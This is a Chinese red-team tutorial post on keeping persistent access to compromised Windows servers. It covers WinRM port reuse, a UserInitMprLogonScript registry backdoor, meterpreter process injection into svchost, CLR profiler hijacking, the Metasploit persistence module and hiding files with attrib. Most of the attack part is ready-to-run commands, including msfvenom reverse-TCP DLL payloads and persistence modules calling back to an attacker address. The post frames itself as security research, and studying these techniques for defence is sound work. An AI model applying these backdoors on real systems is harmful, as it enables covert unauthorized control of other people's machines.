『红蓝对抗』Windows权限维持(二)

admin 2022年5月16日20:00:46安全文章评论8 views2578字阅读8分35秒阅读模式

点击蓝字

关注我们



日期:2022-05-16

作者:L-Center

介绍:一些常见的Windows权限维持方式。


0x00 前言

前提条件: 拿到目标服务器administrator权限。

环境:Windows Server2012/windows 7

0x01 维持方式

1.1 端口复用

使用Windows的远程管理管理服务WinRM,结合HTTP.sys驱动自带的端口复用功能。

建立连接后,服务端程序占用极少系统资源,被控端不会在系统性能上有任何察觉。

Windows 2012WinRM服务默认启动并监听了5985端口。

Winsows 72008来说需要手动开启。

winrm qucikconfig -q 启动winrm(winsows 7或2008)netstat -ano 查看端口信息
『红蓝对抗』Windows权限维持(二)

输入如下命令实现端口复用:

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}winrm e winrm/config/listerner
『红蓝对抗』Windows权限维持(二)
『红蓝对抗』Windows权限维持(二)

再次查看端口信息5985端口仍然存在,在Winsows 72008版本中此端口为不开启状态。

『红蓝对抗』Windows权限维持(二)

使用winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

winrm改为80端口。

『红蓝对抗』Windows权限维持(二)

再次查询便可查询不到5985端口信息。

『红蓝对抗』Windows权限维持(二)

客户端中将网络连接属性改为专用后cmd输入:

winrm quickconfig -qwinrm set winrm/config/Client @{TrustedHosts="*"}
『红蓝对抗』Windows权限维持(二)

设置完成后使用winrs命令,即可连接远程WinRM服务执行命令:

winrs -r:http://192.168.30.138 -u:administrator -p:Admin123 whoami获取结果后会直接退出。

『红蓝对抗』Windows权限维持(二)

使用cmd命令即可获取一个交互式的shell

『红蓝对抗』Windows权限维持(二)

1.2 Logon scripts 后门

Logon Scripts优点是能够优先去执行,当用户登录时触发。

REG ADD "HKEY_CURRENT_USEREnvironment" /v UserInitMprLogonScript /t REG_SZ /d "C:UsersAdministratorDesktoptest2.exe"
『红蓝对抗』Windows权限维持(二)

重启或注销登录后得到shell

『红蓝对抗』Windows权限维持(二)

1.3 进程注入

获得meterpreter的会话后,查看权限尝试获取哈希。

『红蓝对抗』Windows权限维持(二)

发现暂无权限,使用ps命令查看当前进程。

『红蓝对抗』Windows权限维持(二)

找到svchost.exe,是以system权限运行。

把后门注入到svchost.exe中,成功获取hash

『红蓝对抗』Windows权限维持(二)

1.4 CLR 劫持

通过修改环境变量,使CLR作用于全局,从而劫持所有.net程序的启动。

CLR需要配置环境变量才可以完全劫持.net

SETX COR_ENABLE_PROFILING 1 /M     设置环境变量为1SETX COR_PROFILER {GGUUGGUU-1234-1234-1234-AABBCCDDEEFF} /M
『红蓝对抗』Windows权限维持(二)

使用msf创建dll后门。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=444 -f dll > test.dll       32msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=444 -f dll > test.dll   64

『红蓝对抗』Windows权限维持(二)

创建完成后使用cmd修改注册表。

REG ADD "HKEY_CURRENT_USERSoftwareClassesCLSID{GGUUGGUU-1234-1234-1234-AABBCCDDEEFF}InProcServer32" /VE /T REG_SZ /D "C:WindowsSystem32test.dll" /F
REG ADD "HKEY_CURRENT_USERSoftwareClassesCLSID{GGUUGGUU-1234-1234-1234-AABBCCDDEEFF}InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
『红蓝对抗』Windows权限维持(二)

修改完成后在cmd输入powershell后在kali监听得到shell

『红蓝对抗』Windows权限维持(二)

1.5 Persistence 后门

Persistence是使用安装自动方式的持久性后门程序,可以利用它创建注册和文件。

先通过攻击获取一个meterpreter shell后输入:

run persistence -A -S -U -i 5 -p 4444 -r 192.168.30.130-A 自启动payload-S 系统登录自动加载payload-U/X 用户登录时自动启动-i 回连的时间间隔

『红蓝对抗』Windows权限维持(二)

执行结束后,获得了一个Persistence后门。重启kali后重新监听后得到shell

『红蓝对抗』Windows权限维持(二)

1.6 attrib 命令隐藏

attribWindows自带命令行工具,用来显示或更改文件属性,使用起来比较简单方便。

-R 只读文件属性。-A 存档文件属性。-S 系统文件属性。-H 隐藏文件属性。-I 无内容索引文件属性。/S 处理当前文件夹及其所有子文件夹中的匹配文件。/D 也处理文件夹。/L 处理符号链接和符号链接目标的属性。

输入attrib +r +h +s将其隐藏。隐藏后只能通过attrib命令查看。

『红蓝对抗』Windows权限维持(二)

『红蓝对抗』Windows权限维持(二)


0x02 总结

要注意目标系统是32位还是64位,以此来生成对应的payload

Windows操作系统的持久化后门还有很多,这里只是学习的一小部分。


『红蓝对抗』Windows 权限维持(一)

4月8日

『红蓝对抗』Windows权限维持(二)

阅读全文

『红蓝对抗』Windows权限维持(二)



免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。

『红蓝对抗』Windows权限维持(二)

宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。

团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。

对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。

原文始发于微信公众号(宸极实验室):『红蓝对抗』Windows权限维持(二)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月16日20:00:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  『红蓝对抗』Windows权限维持(二) http://cn-sec.com/archives/1011333.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: